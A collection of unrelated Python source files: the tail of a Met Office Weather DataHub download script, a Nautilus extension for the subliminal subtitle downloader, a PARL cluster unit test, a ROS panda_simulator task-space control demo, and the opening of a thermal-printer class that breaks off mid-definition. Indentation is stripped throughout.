requrl = baseUrl + "/runs/" + model + "?sort=RUNDATETIME"
for loop in range(retryCount):
reqr = requests.get(requrl, headers=runHeaders)
if printUrl == True:
print("get_model_runs: ", requrl)
if requrl != reqr.url:
print("redirected to: ", reqr.url)
if reqr.status_code != 200:
print(
"ERROR: Unable to get latest run for model: "
+ model
+ " status code: ",
reqr.status_code,
)
if loop != (retryCount - 1):
time.sleep(10)
continue
else:
print("ERROR: Ran out of retries to get latest run for model: ")
break
rundetails = reqr.json()
rawlatest = rundetails["completeRuns"]
modelRuns[model] = rawlatest[0]["run"] + ":" + rawlatest[0]["runDateTime"]
break
return modelRuns
def run_wanted(allorders, ordername, latestrun):
result = False
for ords in allorders["orders"]:
if ords["orderId"] == ordername:
if latestrun in ords["requiredLatestRuns"]:
result = True
else:
result = False
return result
def order_exists(allorders, ordername):
result = False
for ords in allorders["orders"]:
if ords["orderId"] == ordername:
result = True
break
return result
def get_model_from_order(allorders, ordername):
result = "Not found"
for ords in allorders["orders"]:
if ords["orderId"] == ordername:
result = ords["modelId"]
break
return result
if __name__ == "__main__":
ROOT_FOLDER = "downloaded"
LATEST_FOLDER = "latest"
RESULTS_FOLDER = "results"
FAILURES_FOLDER = "failures"
parser = argparse.ArgumentParser(
description="Download all the files for one or more order from the CDA delivery service."
)
parser.add_argument(
"-u",
"--url",
action="store",
dest="baseUrl",
default=BASE_URL,
help="Base URL used to access Weather DataHub API. Defaults to https://api-metoffice.apiconnect.ibmcloud.com/metoffice/production/1.0.0.",
)
parser.add_argument(
"-c",
"--client",
action="store",
dest="clientId",
default="",
help="REQUIRED: Client ID of your WDH Application",
)
parser.add_argument(
"-s",
"--secret",
action="store",
dest="secret",
default="",
help="REQUIRED: Your WDH API Gateway secret",
)
parser.add_argument(
"-o",
"--orders",
action="store",
dest="ordersToDownload",
default="default_order",
help="REQUIRED: Comma separated list of order names to download.",
)
parser.add_argument(
"-r",
"--runs",
action="store",
dest="orderRuns",
default="00,06,12,18",
help="Comma separated list of runs to download or -r latest to get latest run.",
)
parser.add_argument(
"-w",
"--workers",
action="store",
dest="workers",
default=4,
type=int,
help="Number of workers used to perform downloads. Defaults to 4.",
)
parser.add_argument(
"-j",
"--join",
action="store_true",
dest="joinFiles",
default=False,
help="If present, all the downloaded files will be concatenated together.",
)
parser.add_argument(
"-v",
"--verbose",
action="store_true",
dest="verbose",
default=False,
help="Verbose mode.",
)
parser.add_argument(
"-d",
"--folderdate",
action="store_true",
dest="folderdate",
default=False,
help="Add the YYYYMMDDhhmm_RR to the download folder.",
)
parser.add_argument(
"-l",
"--location",
action="store",
dest="location",
default="",
help="The base folder to store files",
)
parser.add_argument(
"-m",
"--modellist",
action="store",
dest="modellist",
default=MODEL_LIST,
help="Pass the ist of models to support.",
)
parser.add_argument(
"-a",
"--retry",
action="store_true",
dest="retry",
default=False,
help="Retry again the failures automatically.",
)
parser.add_argument(
"-p",
"--retryperiod",
action="store",
dest="retryperiod",
default="300",
help="Retry delay in seconds.",
)
parser.add_argument(
"-x",
"--printurl",
action="store_true",
dest="printurl",
default=False,
help="Print all accessed URLs and redirects",
)
parser.add_argument(
"-z",
"--debug",
action="store_true",
dest="debugmode",
default=False,
help="Switch to debug mode.",
)
parser.add_argument(
"-k",
"--apikey",
action="store",
dest="apikey",
default="",
help="Use direct API Key when not via APIM.",
)
args = parser.parse_args()
baseUrl = args.baseUrl
clientId = args.clientId
secret = args.secret
orderRuns = args.orderRuns
useEnhancedApi = True
verbose = args.verbose
folderdate = args.folderdate
numThreads = args.workers
myModelList = args.modellist
joinFiles = args.joinFiles
retry = args.retry
retryperiod = args.retryperiod
debugMode = args.debugmode
baseFolder = args.location
apikey = args.apikey
printUrl = args.printurl
if debugMode == True:
print("WARNING: As we are in debug mode setting workers to one.")
numThreads = 1
if args.ordersToDownload == "":
print("ERROR: You must pass an orders list to download.")
exit()
else:
ordersToDownload = args.ordersToDownload.lower().split(",")
joinFiles = False
numFilesPerOrder = 0
guidFileNames = False
# Client ID and Sectet must be supplied
if (clientId == "" or secret == "") and apikey == "":
print("ERROR: IBM client and secret must be supplied.")
exit()
if apikey == "":
requestHeaders = {"x-ibm-client-id": clientId, "x-ibm-client-secret": secret}
else:
requestHeaders = {"x-api-key": apikey}
if baseFolder != "":
try:
if baseFolder[-1] != "/":
baseFolder = baseFolder + "/"
os.makedirs(baseFolder, exist_ok=True)
except OSError as error:
print("ERROR: Base folder", baseFolder, "cannot be accessed or created.")
exit()
os.makedirs(baseFolder + ROOT_FOLDER, exist_ok=True)
os.makedirs(baseFolder + LATEST_FOLDER, exist_ok=True)
os.makedirs(baseFolder + RESULTS_FOLDER, exist_ok=True)
os.makedirs(baseFolder + FAILURES_FOLDER, exist_ok=True)
if verbose:
print("Download Orders")
print("===============")
ordersfound = False
# Get my orders for future reference
myOrders = get_my_orders(baseUrl, requestHeaders)
if len(myOrders["orders"]) == 0:
print(
"WARNING: You have no orders active on Weather DataHub. Please confirm some orders and try again."
)
exit()
# For each of the orders to download get the model and add to my model list
myModelList = []
for orderName in ordersToDownload:
newModel = get_model_from_order(myOrders, orderName)
if newModel not in myModelList:
myModelList.append(newModel)
if verbose == True:
print(
"From the orders to process we have the following model list from active orders: ",
myModelList,
)
if myModelList == [] or myModelList == ["Not found"]:
print(
"ERROR: No models could be extracted from the orders to process: "
+ str(ordersToDownload)
)
exit()
myModelRuns = get_model_runs(baseUrl, requestHeaders, myModelList)
retryManifest = []
# Total number of files downloaded
totalFiles = 0
finalRuns = []
myTimeStamp = datetime.now().strftime("%d-%b-%Y-%H-%M-%S")
# Process selected orders, generating tasks for the worker to actually download the file.
for orderName in ordersToDownload:
initTime = datetime.now()
responseLog = []
downloadErrorLog = []
if verbose:
print("Processing: " + orderName)
if not order_exists(myOrders, orderName):
print(
"ERROR: You've asked for an order called: "
+ orderName
+ " which doesn't appear in the list of active orders."
)
continue
if orderRuns == "":
runsToDownload = ["00", "06", "12", "18"]
else:
if orderRuns == "latest":
modelToGet = get_model_from_order(myOrders, orderName)
if modelToGet not in myModelList:
print(
"ERROR: No idea what model: "
+ modelToGet
+ " is so terminating!"
)
exit()
runsToDownload = get_latest_run(modelToGet, orderName, myModelRuns)
if runsToDownload[:4] == "done":
if verbose:
print(
"We have done this latest run "
+ runsToDownload[5:]
+ " already!"
)
continue
# Do I want this run?
finalRuns = []
runWanted = run_wanted(myOrders, orderName, runsToDownload)
if runWanted and verbose:
print("This run " + runsToDownload + " is wanted.")
else:
if verbose:
print("This run " + runsToDownload + " is not wanted")
continue
runsToDownload = runsToDownload.split(",")
finalRuns.append(runsToDownload)
else:
runsToDownload = orderRuns.split(",")
finalRuns = []
# Ensure only runs wanted are asked for
for checkRun in runsToDownload:
if run_wanted(myOrders, orderName, checkRun):
finalRuns.append(checkRun)
else:
print(
"WARNING: The run "
+ checkRun
+ " has been asked for but doesn't appear in the order "
+ orderName
)
runsToDownload = finalRuns
if len(finalRuns) == 0:
print(
"WARNING: No runs for order "
+ orderName
+ "were found. Don't expect any data."
)
continue
order = get_order_details(
baseUrl, requestHeaders, orderName, useEnhancedApi, runsToDownload
)
if order != None:
# Create queue and threads for processing downloads
taskQueue = queue.Queue()
taskThreads = []
for i in range(numThreads):
t = threading.Thread(target=download_worker)
taskThreads.append(t)
# End of set up threads
ordersfound = True
# Break down the files in to those needed for each run
filesByRun = get_files_by_run(order, runsToDownload, numFilesPerOrder)
# Now queue up tasks to down load each file
for run in runsToDownload:
if folderdate == True:
folder = (
baseFolder
+ ROOT_FOLDER
+ "/"
+ initTime.strftime("%Y%m%d%H%M_")
+ run
+ "/"
+ orderName
+ "_"
+ run
)
else:
folder = baseFolder + ROOT_FOLDER + "/" + orderName + "_" + run
os.makedirs(folder, exist_ok=True)
for fileId in filesByRun[run]:
downloadTask = {
"baseUrl": baseUrl,
"requestHeaders": requestHeaders,
"orderName": orderName,
"fileId": fileId,
"guidFileNames": guidFileNames,
"folder": folder,
"responseLog": responseLog,
"downloadErrorLog": downloadErrorLog,
}
taskQueue.put(downloadTask)
# Start the worker threads
if ordersfound == False:
print(
"WARNING: No orders or runs were found from this list: ",
ordersToDownload,
)
continue
if verbose:
print(" Starting downloads")
for t in taskThreads:
t.start()
# Wait for all the queued scenarios to be processed
taskQueue.join()
# Stop all the threads
for i in range(numThreads):
taskQueue.put(None)
for t in taskThreads:
t.join()
# Write out the summary CSV file
summaryFileName = (
baseFolder + "results/summary-" + orderName + "-" + myTimeStamp + ".txt"
)
failuresFileName = (
baseFolder + "failures/summary-" + orderName + "-" + myTimeStamp + ".txt"
)
if len(downloadErrorLog) > 0:
write_failures(downloadErrorLog, failuresFileName)
print(
"WARNING: there were",
len(downloadErrorLog),
"detected download failures\nDetails in file: " + failuresFileName,
)
if retry:
retryManifest = retryManifest + downloadErrorLog
write_summary(responseLog, summaryFileName, initTime)
totalFiles = totalFiles + len(responseLog)
if verbose and len(responseLog) > 0:
print(" Created summary: " + summaryFileName)
# End of order processing loop
if verbose:
print("All file downloads have been attempted.")
# Do we have any retries we want to do
if retry and len(retryManifest) > 0:
if verbose:
print("We have files to retry")
totalFailures = len(retryManifest)
failureRate = (totalFailures / totalFiles) * 100.00
if verbose:
print("The failure rate is", failureRate, "percent.")
if totalFailures > 100:
print(
"ERROR: total failures of",
totalFailures,
"is more than the 100 limit can't recover.",
)
exit()
if totalFailures == totalFiles:
print(
"ERROR: Everything failed for all",
totalFiles,
"files - terminating program.",
)
exit()
if failureRate > 50.0 and totalFailures > 50:
print(
"ERROR: failure rate > 50 percent and more than 20 failures - terminating."
)
exit()
# I can now retry
# Wait for the asked time
if verbose:
print("Wait of", retryperiod, "starting.")
time.sleep(int(retryperiod))
if verbose:
print("Wait of", retryperiod, "ended.")
# Wait ended
actualHeaders = {"Accept": "application/x-grib"}
actualHeaders.update(requestHeaders)
stillInError = []
deleteFile = False
for retryFile in retryManifest:
if verbose:
print("Re-trying " + retryFile["fileid"])
startTime = time.time()
failuresFileName = (
baseFolder
+ "failures/summary-"
+ orderName
+ "-"
+ myTimeStamp
+ ".txt"
)
summaryFileName = (
baseFolder + "results/summary-" + orderName + "-" + myTimeStamp + ".txt"
)
if deleteFile == False:
if os.path.isfile(failuresFileName):
os.remove(failuresFileName)
deleteFile = True
error = False
try:
if apikey != "":
requestHeaders = {"x-api-key": apikey}
if verbose:
print(
"Retrying",
baseUrl,
retryFile["ordername"],
retryFile["fileid"],
retryFile["folder"],
)
downloadResp = get_order_file(
baseUrl,
requestHeaders,
retryFile["ordername"],
retryFile["fileid"],
False,
retryFile["folder"],
startTime,
)
fileSize = os.path.getsize(downloadResp[1])
except Exception as ex:
error = True
errMsg = ex.args
status = ex.args[1]
if not error:
with open(summaryFileName, "a") as sumfile:
sumfile.write(
retryFile["ordername"]
+ ",0,0,0,"
+ retryFile["fileid"]
+ ",False,RETRY-OK,"
+ downloadResp[1]
+ ","
+ datetime.now().strftime("%H-%M-%S-%f")
+ "\n"
)
sumfile.close()
else:
with open(failuresFileName, "a") as errfile:
errfile.write(
"File "
+ retryFile["fileid"]
+ " FAILED on retry. errMsg: "
+ format(errMsg)
+ " status: "
+ str(status)
+ "\n"
)
errfile.close()
stillInError.append(retryFile.copy())
# End of python program
|
nautilus-subliminal.py | # -*- coding: utf-8 -*-
from __future__ import division
from collections import defaultdict
from datetime import timedelta
import locale
from locale import gettext as _
import os
import threading
from babelfish import Language
from gi.repository import GObject, Gtk, Nautilus
from subliminal import (VIDEO_EXTENSIONS, AsyncProviderPool, __copyright__, __version__, check_video, compute_score,
get_scores, provider_manager, refine, refiner_manager, region, save_subtitles, scan_video,
scan_videos)
from subliminal.cli import Config, MutexLock, cache_file, config_file, dirs
from subliminal.core import search_external_subtitles
locale.bindtextdomain('subliminal', os.path.join(os.path.dirname(__file__), 'subliminal', 'locale'))
locale.textdomain('subliminal')
ignored_languages = {Language(l) for l in (
'ang', 'arc', 'dsb', 'dum', 'enm', 'frm', 'fro', 'gmh', 'goh', 'grc', 'ina', 'mga', 'mis', 'nds', 'non', 'ota',
'peo', 'pro', 'sga', 'und'
)}
class ChooseHandler(object):
"""Signal handler for the choose window.
This class will download the selected subtitle on row-activated signal.
:param config: a configuration object.
:type config: :class:`~subliminal.cli.Config`
:param video: the video.
:type video: :class:`~subliminal.video.Video`
:param subtitles: the available of subtitles.
:type subtitles: list of :class:`~subliminal.subtitle.Subtitle`
:param spinner: the spinner to show during download.
:type spinner: :class:`GtkSpinner`
"""
def __init__(self, config, video, subtitles, spinner):
self.config = config
self.video = video
self.subtitles = {s.provider_name + '-' + s.id: s for s in subtitles}
self.spinner = spinner
def on_subtitles_treeview_row_activated(self, treeview, path, view_column):
model = treeview.get_model()
iter = model.get_iter(path)
# return if already downloaded
if model.get_value(iter, 6):
return
# get the subtitle object
subtitle = self.subtitles[model.get_value(iter, 3).lower() + '-' + model.get_value(iter, 0)]
# start the spinner
self.spinner.start()
def _download_subtitle():
# download the subtitle
with AsyncProviderPool(providers=self.config.providers,
provider_configs=self.config.provider_configs) as pool:
pool.download_subtitle(subtitle)
# save the subtitle
save_subtitles(self.video, [subtitle], single=self.config.single)
# mark the subtitle as downloaded
model.set_value(iter, 6, True)
# stop the spinner
self.spinner.stop()
threading.Thread(target=_download_subtitle).start()
def on_subtitles_scrolledwindow_delete_event(self, *args):
Gtk.main_quit(*args)
class ConfigHandler(object):
"""Signal handler for the configuration window.
This class converts the values from the window and forward them to the configuration object. When the window is
closed, the configuration is written.
:param config: a configuration object.
:type config: :class:`~subliminal.cli.Config`
"""
def __init__(self, config):
self.config = config
def on_languages_treeview_selection_changed(self, selection):
model, paths = selection.get_selected_rows()
languages = {Language.fromietf(model.get_value(model.get_iter(p), 1)) for p in paths}
if languages:
self.config.languages = languages
def on_providers_treeview_selection_changed(self, selection):
model, paths = selection.get_selected_rows()
providers = [model.get_value(model.get_iter(p), 0).lower() for p in paths]
if providers:
self.config.providers = providers
def on_refiners_treeview_selection_changed(self, selection):
model, paths = selection.get_selected_rows()
refiners = [model.get_value(model.get_iter(r), 0).lower() for r in paths]
self.config.refiners = refiners
def on_single_switch_active_notify(self, switch, gparam):
self.config.single = switch.get_active()
def on_embedded_subtitles_switch_active_notify(self, switch, gparam):
self.config.embedded_subtitles = switch.get_active()
def on_age_spinbutton_value_changed(self, spin_button):
self.config.age = timedelta(days=spin_button.get_value())
def on_hearing_impaired_switch_active_notify(self, switch, gparam):
self.config.hearing_impaired = switch.get_active()
def on_min_score_spinbutton_value_changed(self, spin_button):
self.config.min_score = spin_button.get_value()
def on_config_window_delete_event(self, *args):
self.config.write()
Gtk.main_quit(*args)
class SubliminalExtension(GObject.GObject, Nautilus.MenuProvider):
def __init__(self):
# create app directory
try:
os.makedirs(dirs.user_cache_dir)
os.makedirs(dirs.user_config_dir)
except OSError:
if not os.path.isdir(dirs.user_cache_dir) or not os.path.isdir(dirs.user_config_dir):
raise
# open config file
self.config = Config(os.path.join(dirs.user_config_dir, config_file))
self.config.read()
# configure cache
region.configure('dogpile.cache.dbm', expiration_time=timedelta(days=30),
arguments={'filename': os.path.join(dirs.user_cache_dir, cache_file),
'lock_factory': MutexLock})
def get_file_items(self, window, files):
# lightweight filter on file type and extension
if not any(f.is_directory() or f.get_name().endswith(VIDEO_EXTENSIONS) for f in files):
return
# create subliminal menu
subliminal_menuitem = Nautilus.MenuItem(name='SubliminalMenu::Subliminal', label='Subliminal')
sub_menus = Nautilus.Menu()
subliminal_menuitem.set_submenu(sub_menus)
# create choose submenu on single file
if len(files) == 1 and not files[0].is_directory():
choose_menuitem = Nautilus.MenuItem(name='SubliminalSubMenu::Choose', label=_('Choose subtitles'))
choose_menuitem.connect('activate', self.choose_callback, files)
sub_menus.append_item(choose_menuitem)
# create download submenu
download_menuitem = Nautilus.MenuItem(name='SubliminalSubMenu::Download', label=_('Download subtitles'))
download_menuitem.connect('activate', self.download_callback, files)
sub_menus.append_item(download_menuitem)
# create configure submenu
configure_menuitem = Nautilus.MenuItem(name='SubliminalSubMenu::Configure', label=_('Configure...'))
configure_menuitem.connect('activate', self.config_callback)
sub_menus.append_item(configure_menuitem)
return subliminal_menuitem,
def get_background_items(self, window, current_folder):
return []
def choose_callback(self, menuitem, files):
# scan the video
video = scan_video(files[0].get_location().get_path())
refine(video, episode_refiners=self.config.refiners, movie_refiners=self.config.refiners,
embedded_subtitles=False)
# load the interface
builder = Gtk.Builder()
builder.set_translation_domain('subliminal')
builder.add_from_file(os.path.join(os.path.dirname(__file__), 'subliminal', 'ui', 'choose.glade'))
# set the video filename
video_filename = builder.get_object('video_filename_label')
video_filename.set_text(files[0].get_name())
# start the spinner
spinner = builder.get_object('spinner')
spinner.start()
def _list_subtitles():
# list subtitles
with AsyncProviderPool(providers=self.config.providers,
provider_configs=self.config.provider_configs) as pool:
subtitles = pool.list_subtitles(video, self.config.languages)
# fill the subtitle liststore
subtitle_liststore = builder.get_object('subtitle_liststore')
for s in subtitles:
scaled_score = compute_score(s, video)
scores = get_scores(video)
if s.hearing_impaired == self.config.hearing_impaired:
scaled_score -= scores['hearing_impaired']
scaled_score *= 100 / scores['hash']
subtitle_liststore.append([s.id, nice_language(s.language), scaled_score, s.provider_name.capitalize(),
s.hearing_impaired, s.page_link, False])
subtitle_liststore.set_sort_column_id(2, Gtk.SortType.DESCENDING)
# stop the spinner
spinner.stop()
# connect signals
builder.connect_signals(ChooseHandler(self.config, video, subtitles, spinner))
threading.Thread(target=_list_subtitles).start()
# display window
window = builder.get_object('subtitle_window')
window.show_all()
Gtk.main()
def download_callback(self, menuitem, files):
# scan videos
videos = []
for f in files:
# ignore non-writable locations
if not f.can_write():
continue
# directories
if f.is_directory():
try:
scanned_videos = scan_videos(f.get_location().get_path())
except:
continue
for video in scanned_videos:
if check_video(video, languages=self.config.languages, age=self.config.age,
undefined=self.config.single):
video.subtitle_languages |= set(search_external_subtitles(video.name).values())
refine(video, episode_refiners=self.config.refiners, movie_refiners=self.config.refiners,
embedded_subtitles=self.config.embedded_subtitles)
videos.append(video)
continue
# other inputs
try:
video = scan_video(f.get_location().get_path())
except:
continue
if check_video(video, languages=self.config.languages, undefined=self.config.single):
video.subtitle_languages |= set(search_external_subtitles(video.name).values())
refine(video, episode_refiners=self.config.refiners, movie_refiners=self.config.refiners,
embedded_subtitles=self.config.embedded_subtitles)
videos.append(video)
# download best subtitles
downloaded_subtitles = defaultdict(list)
with AsyncProviderPool(providers=self.config.providers, provider_configs=self.config.provider_configs) as pool:
for v in videos:
scores = get_scores(v)
subtitles = pool.download_best_subtitles(
pool.list_subtitles(v, self.config.languages - v.subtitle_languages),
v, self.config.languages, min_score=scores['hash'] * self.config.min_score / 100,
hearing_impaired=self.config.hearing_impaired, only_one=self.config.single
)
downloaded_subtitles[v] = subtitles
# save subtitles
for v, subtitles in downloaded_subtitles.items():
save_subtitles(v, subtitles, single=self.config.single)
def config_callback(self, *args, **kwargs):
# load the interface
builder = Gtk.Builder()
builder.set_translation_domain('subliminal')
builder.add_from_file(os.path.join(os.path.dirname(__file__), 'subliminal', 'ui', 'config.glade'))
# configure the about page
aboutdialog = builder.get_object('aboutdialog')
aboutdialog.set_version(__version__)
aboutdialog.set_copyright(__copyright__)
aboutdialog.vbox.reparent(builder.get_object('about_box'))
# fill the language liststore
available_languages = set()
for provider in provider_manager:
available_languages |= provider.plugin.languages
language_liststore = builder.get_object('language_liststore')
for language in sorted(available_languages - ignored_languages, key=nice_language):
language_liststore.append([nice_language(language), str(language)])
# set language selection
language_treeselection = builder.get_object('language_treeselection')
for language in language_liststore:
if Language.fromietf(language[1]) in self.config.languages:
language_treeselection.select_path(language.path)
# fill the provider liststore
provider_liststore = builder.get_object('provider_liststore')
for provider in sorted([p.name for p in provider_manager]):
provider_liststore.append([provider.capitalize(), str(self.config.provider_configs.get(provider, ''))])
# set provider selection
provider_treeselection = builder.get_object('provider_treeselection')
for provider in provider_liststore:
if provider[0].lower() in self.config.providers:
provider_treeselection.select_iter(provider.iter)
# fill the refiner liststore
refiner_liststore = builder.get_object('refiner_liststore')
for refiner in sorted([r.name for r in refiner_manager], key=lambda r: (r not in self.config.refiners, r)):
refiner_liststore.append([refiner.capitalize()])
# set refiner selection
refiner_treeselection = builder.get_object('refiner_treeselection')
for refiner in refiner_liststore:
if refiner[0].lower() in self.config.refiners:
refiner_treeselection.select_iter(refiner.iter)
# set single state
single_switch = builder.get_object('single_switch')
single_switch.set_active(self.config.single)
# set embedded subtitles state
embedded_subtitles_switch = builder.get_object('embedded_subtitles_switch')
embedded_subtitles_switch.set_active(self.config.embedded_subtitles)
# set age value
age_spinbutton = builder.get_object('age_spinbutton')
age_spinbutton.set_value(self.config.age.days)
# set hearing impaired state
hearing_impaired_switch = builder.get_object('hearing_impaired_switch')
hearing_impaired_switch.set_active(self.config.hearing_impaired)
# set min score value
min_score_spinbutton = builder.get_object('min_score_spinbutton')
min_score_spinbutton.set_value(self.config.min_score)
# connect signals
builder.connect_signals(ConfigHandler(self.config))
# display window
window = builder.get_object('config_window')
window.show_all()
Gtk.main()
def nice_language(language):
"""Format a :class:`~babelfish.Language` in a nice string with country name if any.
:param language: the language.
:type language: :class:`~babelfish.Language`
:return: a nice representation of the language.
:rtype: str
"""
if language.country is not None:
return '{name} ({country})'.format(name=language.name, country=language.country.name.capitalize())
return language.name
|
future_mode_cluster_2_test.py | # Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import parl
import time
import subprocess
import threading
from parl.remote.master import Master
from parl.remote.worker import Worker
from parl.remote.client import disconnect
from parl.remote import exceptions
from parl.utils import get_free_tcp_port
@parl.remote_class(wait=False)
class Actor(object):
def __init__(self, arg1=None, arg2=None):
self.arg1 = arg1
self.arg2 = arg2
def get_arg1(self):
return self.arg1
def get_arg2(self):
return self.arg2
def set_arg1(self, value):
self.arg1 = value
def set_arg2(self, value):
self.arg2 = value
def add_one(self, value):
value += 1
return value
def add(self, x, y):
time.sleep(3)
return x + y
def will_raise_exception_func(self):
x = 1 / 0
class TestCluster(unittest.TestCase):
def tearDown(self):
disconnect()
time.sleep(60) # wait for test case finishing
def test_reset_actor(self):
port = get_free_tcp_port()
# start the master
master = Master(port=port)
th = threading.Thread(target=master.run)
th.start()
time.sleep(3)
worker1 = Worker('localhost:{}'.format(port), 4)
parl.connect('localhost:{}'.format(port))
for _ in range(10):
actor = Actor()
future_result = actor.add_one(1)
self.assertEqual(future_result.get(), 2)
del actor
for _ in range(10):
if master.cpu_num == 4:
break
time.sleep(10)
self.assertEqual(master.cpu_num, 4)
worker1.exit()
master.exit()
if __name__ == '__main__':
unittest.main()
|
task_space_control_using_sim_only.py | #! /usr/bin/env python
# /***************************************************************************
#
# @package: panda_siimulator_examples
# @metapackage: panda_simulator
# @author: Saif Sidhik <sxs1412@bham.ac.uk>
#
# **************************************************************************/
# /***************************************************************************
# Copyright (c) 2019-2021, Saif Sidhik
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# **************************************************************************/
"""
This is a demo showing task-space control on the
simulator robot using the ROS topics and messages directly
from panda_simulator. The task-space force for the desired
pose is computed using a simple PD law, and the corresponding
joint torques are computed and sent to the robot.
After launching the simulator (panda_world.launch),
run this demo using the command:
roslaunch panda_simulator_examples demo_task_space_control.launch --use_fri:=false
"""
import copy
import rospy
import threading
import quaternion
import numpy as np
from geometry_msgs.msg import Point
from visualization_msgs.msg import *
from interactive_markers.interactive_marker_server import *
from franka_core_msgs.msg import EndPointState, JointCommand, RobotState
from rviz_markers import RvizMarkers
# --------- Modify as required ------------
# Task-space controller parameters
# stiffness gains
P_pos = 50.
P_ori = 25.
# damping gains
D_pos = 10.
D_ori = 1.
# -----------------------------------------
publish_rate = 100
JACOBIAN = None
CARTESIAN_POSE = None
CARTESIAN_VEL = None
destination_marker = RvizMarkers()
def _on_robot_state(msg):
"""
Callback function for updating jacobian and EE velocity from robot state
"""
global JACOBIAN, CARTESIAN_VEL
JACOBIAN = np.asarray(msg.O_Jac_EE).reshape(6,7,order = 'F')
CARTESIAN_VEL = {
'linear': np.asarray([msg.O_dP_EE[0], msg.O_dP_EE[1], msg.O_dP_EE[2]]),
'angular': np.asarray([msg.O_dP_EE[3], msg.O_dP_EE[4], msg.O_dP_EE[5]]) }
def _on_endpoint_state(msg):
"""
Callback function to get current end-point state
"""
# pose message received is a vectorised column major transformation matrix
global CARTESIAN_POSE
cart_pose_trans_mat = np.asarray(msg.O_T_EE).reshape(4,4,order='F')
CARTESIAN_POSE = {
'position': cart_pose_trans_mat[:3,3],
'orientation': quaternion.from_rotation_matrix(cart_pose_trans_mat[:3,:3]) }
def quatdiff_in_euler(quat_curr, quat_des):
"""
Compute difference between quaternions and return
Euler angles as difference
"""
curr_mat = quaternion.as_rotation_matrix(quat_curr)
des_mat = quaternion.as_rotation_matrix(quat_des)
rel_mat = des_mat.T.dot(curr_mat)
rel_quat = quaternion.from_rotation_matrix(rel_mat)
vec = quaternion.as_float_array(rel_quat)[1:]
if rel_quat.w < 0.0:
vec = -vec
return -des_mat.dot(vec)
def control_thread(rate):
"""
Actual control loop. Uses goal pose from the feedback thread
and current robot states from the subscribed messages to compute
task-space force, and then the corresponding joint torques.
"""
while not rospy.is_shutdown():
error = 100.
while error > 0.005:
curr_pose = copy.deepcopy(CARTESIAN_POSE)
curr_pos, curr_ori = curr_pose['position'],curr_pose['orientation']
curr_vel = (CARTESIAN_VEL['linear']).reshape([3,1])
curr_omg = CARTESIAN_VEL['angular'].reshape([3,1])
delta_pos = (goal_pos - curr_pos).reshape([3,1])
delta_ori = quatdiff_in_euler(curr_ori, goal_ori).reshape([3,1])
# Desired task-space force using PD law
F = np.vstack([P_pos*(delta_pos), P_ori*(delta_ori)]) - \
np.vstack([D_pos*(curr_vel), D_ori*(curr_omg)])
error = np.linalg.norm(delta_pos) + np.linalg.norm(delta_ori)
J = copy.deepcopy(JACOBIAN)
# joint torques to be commanded
tau = np.dot(J.T,F)
# publish joint commands
command_msg.effort = tau.flatten()
joint_command_publisher.publish(command_msg)
rate.sleep()
def process_feedback(feedback):
"""
InteractiveMarker callback function. Update target pose.
"""
global goal_pos, goal_ori
if feedback.event_type == InteractiveMarkerFeedback.MOUSE_UP:
p = feedback.pose.position
q = feedback.pose.orientation
goal_pos = np.array([p.x,p.y,p.z])
goal_ori = np.quaternion(q.w, q.x,q.y,q.z)
def _on_shutdown():
"""
Clean shutdown controller thread when rosnode dies.
"""
global ctrl_thread, cartesian_state_sub, \
robot_state_sub, joint_command_publisher
if ctrl_thread.is_alive():
ctrl_thread.join()
robot_state_sub.unregister()
cartesian_state_sub.unregister()
joint_command_publisher.unregister()
if __name__ == "__main__":
# global goal_pos, goal_ori, ctrl_thread
rospy.init_node("ts_control_sim_only")
# if not using franka_ros_interface, you have to subscribe to the right topics
# to obtain the current end-effector state and robot jacobian for computing
# commands
cartesian_state_sub = rospy.Subscriber(
'panda_simulator/custom_franka_state_controller/tip_state',
EndPointState,
_on_endpoint_state,
queue_size=1,
tcp_nodelay=True)
robot_state_sub = rospy.Subscriber(
'panda_simulator/custom_franka_state_controller/robot_state',
RobotState,
_on_robot_state,
queue_size=1,
tcp_nodelay=True)
# create joint command message and fix its type to joint torque mode
command_msg = JointCommand()
command_msg.names = ['panda_joint1','panda_joint2','panda_joint3',\
'panda_joint4','panda_joint5','panda_joint6','panda_joint7']
command_msg.mode = JointCommand.TORQUE_MODE
# Also create a publisher to publish joint commands
joint_command_publisher = rospy.Publisher(
'panda_simulator/motion_controller/arm/joint_commands',
JointCommand,
tcp_nodelay=True,
queue_size=1)
# wait for messages to be populated before proceeding
rospy.loginfo("Subscribing to robot state topics...")
while (True):
if not (JACOBIAN is None or CARTESIAN_POSE is None):
break
rospy.loginfo("Recieved messages; Starting Demo.")
pose = copy.deepcopy(CARTESIAN_POSE)
start_pos, start_ori = pose['position'],pose['orientation']
goal_pos, goal_ori = start_pos, start_ori # set goal pose a starting pose in the beginning
# start controller thread
rospy.on_shutdown(_on_shutdown)
rate = rospy.Rate(publish_rate)
ctrl_thread = threading.Thread(target=control_thread, args = [rate])
ctrl_thread.start()
# ------------------------------------------------------------------------------------
server = InteractiveMarkerServer("basic_control")
position = Point( start_pos[0], start_pos[1], start_pos[2])
marker = destination_marker.makeMarker( False, InteractiveMarkerControl.MOVE_ROTATE_3D, \
position, quaternion.as_float_array(start_ori), True)
server.insert(marker, process_feedback)
server.applyChanges()
rospy.spin()
# ------------------------------------------------------------------------------------ |
printer.py | from .Adafruit_Thermal import Adafruit_Thermal
import threading
import queue
import time
from .format import format as fmt
class _ShutDownPrinter:
pass
class Printer(Adafruit_Thermal):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._print_queue = queue.Queue()
self.thread = threading.Thread(target=self._print_from_async_print_queue)
self.thread.start()
def _print_from_async_print_queue(self):
while True:
try:
print_func = self._print_queue.get()
if isinstance(print_func, _ShutDownPrinter):
break
print_func()
finally:
self._print_queue.task_done()
def async_print(self, *args, **kwargs):
